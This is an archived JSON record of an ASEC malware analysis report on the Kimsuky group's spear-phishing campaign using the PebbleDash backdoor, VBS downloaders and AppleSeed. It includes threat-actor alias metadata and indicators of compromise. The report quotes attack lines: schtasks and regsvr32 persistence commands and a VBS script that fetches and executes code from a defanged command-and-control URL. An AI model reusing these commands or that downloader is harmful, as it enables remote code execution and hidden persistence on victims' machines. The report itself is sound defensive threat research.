{ "id": "eb3ac0e5-5b9f-42fd-b51e-56e3b8761dc5", "created_at": "2026-04-06T00:14:21.700201Z", "updated_at": "2026-04-10T03:37:40.752527Z", "deleted_at": null, "sha1_hash": "4730e151de6ac586d54ee0268bdbcf6bd214bbe2", "title": "APT Attack Cases of Kimsuky Group (PebbleDash) - ASEC", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 257418, "plain_text": "APT Attack Cases of Kimsuky Group (PebbleDash) - ASEC\r\nBy ATCP\r\nPublished: 2021-12-20 · Archived: 2026-04-05 14:52:46 UTC\r\nThe ASEC analysis team has been keeping an eye on the trend of malware that attempts APT attacks, sharing\r\nfindings on the blog. In this confirmed case, PebbleDash backdoor was used in the attack, but logs of AppleSeed,\r\nMeterpreter, and other additional malware strains were also found.\r\nPebbleDash Backdoor\r\nThe attacker sent the following spear phishing email, prompting the user to download and run the compressed file\r\nafter clicking the link for the attachment.\r\nSpear phishing email\r\n“Construction completion notice.pif” file can be seen when decompressing the compressed zip file as shown\r\nbelow. This file is a dropper that drops the PebbleDash backdoor, which performs actual malicious behaviors.\r\nConstruction completion notice.pif dropper\r\nThe dropper drops PebbleDash in the “C:\\ProgramData\\thumbs.db.pif” path and runs it. At the same time, it also\r\ndrops and runs the “C:\\ProgramData\\construction completion notice.pdf” file to trick the user into thinking that a\r\nnormal PDF document file has been opened.\r\nhttps://asec.ahnlab.com/en/30022/\r\nPage 1 of 4\n\nNormal PDF document file that is also created and executed\r\nPebbleDash is a backdoor that is installed through attachments of spear phishing emails; it can receive commands\r\nfrom the attacker to perform malicious behaviors. The commands it can receive from the C\u0026C server and perform\r\nare process and file tasks, downloading and uploading files, etc. As such, the attacker can obtain control of the\r\nsystem through PebbleDash.\r\nThe current confirmed sample is overall similar to the form that has been found since this year, but there are some\r\ndifferences as well. Unlike previous samples that created the system32 folder in the execution path and copied the\r\nfile with the name smss.exe to run recursion, the current one creates the system32 folder but installs the file as\r\nlsass.exe.\r\nPebbleDash requires an argument to run, and the strings that were used as the argument in 2021 were\r\n“zWbTLWgKymXMDwZ” and “MskulCxGMCgpGdM”. The current sample requires\r\n“njXbxuRQyujZeUAGGYaH”.\r\nWhen the malware is executed after having “njXbxuRQyujZeUAGGYaH” as the argument, it copies itself in the\r\nsame path of \\system32\\lsass.exe (C:\\ProgramData\\system32\\lsass.exe). In this case,\r\n“iFfmHUtawXNNxTHEiAAN” and the initial run program path are given as arguments to be executed while the\r\noriginal file proceeds with self-deletion. As a result, you can check the following process in the infected system.\r\nhttps://asec.ahnlab.com/en/30022/\r\nPage 2 of 4\n\nPebbleDash that is executed after installation\r\nVBS Malware\r\nThe PebbleDash sample explained above is just one of the many cases; there were additional malware types found\r\nin the system and related systems. The first one is the VBS malware. The Kimsuky group uses the pif dropper that\r\nis similar to the dropper mentioned above when installing AppleSeed. The pif dropper that installs PebbleDash\r\nonly installs the malware after showing a normal document file, but the one that installs AppleSeed installs VBS\r\nmalware as well.\r\nThe malware uses mshta.exe to download VBS from outside and runs it. The additional VBS script that is\r\ndownloaded and executed through the process steals information and registers 2 task schedulers. The previous\r\ncase used the following commands.\r\n\u003e cmd /c schtasks /Create /SC minute /MO 20 /TN GoogleCache /TR \"wscript //e:vbscript\r\n//b C:\\ProgramData\\Chrome\\.NetFramework.xml\" /f\r\n\u003e cmd /c schtasks /Create /SC minute /MO 1 /TN GoogleUpdate /TR \"regsvr32 /s\r\nC:\\ProgramData\\Chrome\\update.cfg\" /f\r\nThe team could not find the pif dropper for the current case in the infected system, but it had the following task\r\nschedulers registered similar to the case mentioned above.\r\n\"wscript //e:vbscript //b C:\\ProgramData\\Chrome\\.NetFramework.xml\"\r\n\"regsvr32 /sC:\\ProgramData\\Microsoft\\Windows\\update.cfg\"\r\nThe collected “.NetFramework.xml” file has xml for extension, but it is actually a VBS malware which takes the\r\nform of a simple script as shown below. Its sole feature is downloading additional scripts from external source and\r\nrunning them.\r\nOn Error Resume Next:\r\nSet rudrbvikmeaaaoja = CreateObject(\"MSXML2.ServerXMLHTTP.6.0\"):\r\nrudrbvikmeaaaoja.open \"POST\", \"hxxp://m.sharing.p-e[.]kr/index.php?query=me\",\r\n False:rudrbvikmeaaaoja.Send:Execute(rudrbvikmeaaaoja.responseText):\r\nAt the time of the analysis, the C\u0026C server had sent a simple command shown below. However, as the file is\r\nregistered to the task scheduler and periodically runs commands after downloading them, it can perform additional\r\nmalicious behaviors if the attacker sends different commands.\r\nSet WShell=CreateObject(\"WScript.Shell\"):retu=WShell.run(\"cmd /c taskkill /im mshta.exe /f\" , 0 ,true)\r\nAdditional Logs\r\nhttps://asec.ahnlab.com/en/30022/\r\nPage 3 of 4\n\nUp to this part, the analysis was done mostly on actually confirmed files. Given that the VBS malware is installed\r\nby the pif dropper that installs AppleSeed, logs of AppleSeed could also be found on ASD (AhnLab Smart\r\nDefense) infrastructure. The malware was installed on a path disguised as a normal software path and was\r\nexecuted with the command line shown below. Having such an install path is one of the typical characteristics of\r\nAppleSeed.\r\nregsvr32.exe /s \"C:\\ProgramData\\Firmware\\ESTsoft\\Common\\ESTCommon.dll\"\r\nThere were also logs for Meterpreter of Metasploit that tends to be installed in the system infected with\r\nAppleSeed.\r\nThe above sections of this paper provided a brief explanation of the features the discovered malware types\r\npossess.\r\n[File Detection]\r\nFile Detection\r\nDropper/Win.LightShell (2021.12.16.01)\r\nBackdoor/Win.PebbleDash.R458675 (2021.12.16.00)\r\nDownloader/VBS.Agent (2021.12.08.00)\r\nBehavior Detection\r\nExecution/MDP.Wscript.M3817\r\nMD5\r\n25f057bff7de9d3bc2fb325697c56334\r\n269ded557281d38b5966d6227c757e92\r\n71fe5695bd45b72a8bb864636d92944b\r\n7211fed2e2ec624c87782926200d61fd\r\nAdditional IOCs are available on AhnLab TIP.\r\nURL\r\nhttp[:]//m[.]sharing[.]p-e[.]kr/index[.]php?query=me\r\nhttp[:]//tools[.]macbook[.]kro[.]kr/update[.]php\r\nAdditional IOCs are available on AhnLab TIP.\r\nSource: https://asec.ahnlab.com/en/30022/\r\nhttps://asec.ahnlab.com/en/30022/\r\nPage 4 of 4", "extraction_quality": 1, "language": "EN", "sources": [ "Malpedia" ], "references": [ "https://asec.ahnlab.com/en/30022/" ], "report_names": [ "30022" ], "threat_actors": [ { "id": "191d7f9a-8c3c-442a-9f13-debe259d4cc2", "created_at": "2022-10-25T15:50:23.280374Z", "updated_at": "2026-04-10T02:00:05.305572Z", "deleted_at": null, "main_name": "Kimsuky", "aliases": [ "Kimsuky", "Black Banshee", "Velvet Chollima", "Emerald Sleet", "THALLIUM", "APT43", "TA427", "Springtail" ], "source_name": "MITRE:Kimsuky", "tools": [ "Troll Stealer", "schtasks", "Amadey", "GoBear", "Brave Prince", "CSPY Downloader", "gh0st RAT", "AppleSeed", "Gomir", "NOKKI", "QuasarRAT", "Gold Dragon", "PsExec", "KGH_SPY", "Mimikatz", "BabyShark", "TRANSLATEXT" ], "source_id": "MITRE", "reports": null }, { "id": "760f2827-1718-4eed-8234-4027c1346145", "created_at": "2023-01-06T13:46:38.670947Z", "updated_at": "2026-04-10T02:00:03.062424Z", "deleted_at": null, "main_name": "Kimsuky", "aliases": [ "G0086", "Emerald Sleet", "THALLIUM", "Springtail", "Sparkling Pisces", "Thallium", "Operation Stolen Pencil", "APT43", "Velvet Chollima", "Black Banshee" ], "source_name": "MISPGALAXY:Kimsuky", "tools": [ "xrat", "QUASARRAT", "RDP Wrapper", "TightVNC", "BabyShark", "RevClient" ], "source_id": "MISPGALAXY", "reports": null }, { "id": "c8bf82a7-6887-4d46-ad70-4498b67d4c1d", "created_at": "2025-08-07T02:03:25.101147Z", "updated_at": "2026-04-10T02:00:03.846812Z", "deleted_at": null, "main_name": "NICKEL KIMBALL", "aliases": [ "APT43 ", "ARCHIPELAGO ", "Black Banshee ", "Crooked Pisces ", "Emerald Sleet ", "ITG16 ", "Kimsuky ", "Larva-24005 ", "Opal Sleet ", "Ruby Sleet ", "SharpTongue ", "Sparking Pisces ", "Springtail ", "TA406 ", "TA427 ", "THALLIUM ", "UAT-5394 ", "Velvet Chollima " ], "source_name": "Secureworks:NICKEL KIMBALL", "tools": [ "BabyShark", "FastFire", "FastSpy", "FireViewer", "Konni" ], "source_id": "Secureworks", "reports": null }, { "id": "71a1e16c-3ba6-4193-be62-be53527817bc", "created_at": "2022-10-25T16:07:23.753455Z", "updated_at": "2026-04-10T02:00:04.73769Z", "deleted_at": null, "main_name": "Kimsuky", "aliases": [ "APT 43", "Black Banshee", "Emerald Sleet", "G0086", "G0094", "ITG16", "KTA082", "Kimsuky", "Larva-24005", "Larva-25004", "Operation Baby Coin", "Operation Covert Stalker", "Operation DEEP#DRIVE", "Operation DEEP#GOSU", "Operation Kabar Cobra", "Operation Mystery Baby", "Operation Red Salt", "Operation Smoke Screen", "Operation Stealth Power", "Operation Stolen Pencil", "SharpTongue", "Sparkling Pisces", "Springtail", "TA406", "TA427", "Thallium", "UAT-5394", "Velvet Chollima" ], "source_name": "ETDA:Kimsuky", "tools": [ "AngryRebel", "AppleSeed", "BITTERSWEET", "BabyShark", "BoBoStealer", "CSPY Downloader", "Farfli", "FlowerPower", "Gh0st RAT", "Ghost RAT", "Gold Dragon", "GoldDragon", "GoldStamp", "JamBog", "KGH Spyware Suite", "KGH_SPY", "KPortScan", "KimJongRAT", "Kimsuky", "LATEOP", "LOLBAS", "LOLBins", "Living off the Land", "Lovexxx", "MailPassView", "Mechanical", "Mimikatz", "MoonPeak", "Moudour", "MyDogs", "Mydoor", "Network Password Recovery", "PCRat", "ProcDump", "PsExec", "ReconShark", "Remote Desktop PassView", "SHARPEXT", "SWEETDROP", "SmallTiger", "SniffPass", "TODDLERSHARK", "TRANSLATEXT", "Troll Stealer", "TrollAgent", "VENOMBITE", "WebBrowserPassView", "xRAT" ], "source_id": "ETDA", "reports": null } ], "ts_created_at": 1775434461, "ts_updated_at": 1775792260, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/4730e151de6ac586d54ee0268bdbcf6bd214bbe2.pdf", "text": "https://archive.orkl.eu/4730e151de6ac586d54ee0268bdbcf6bd214bbe2.txt", "img": "https://archive.orkl.eu/4730e151de6ac586d54ee0268bdbcf6bd214bbe2.jpg" } }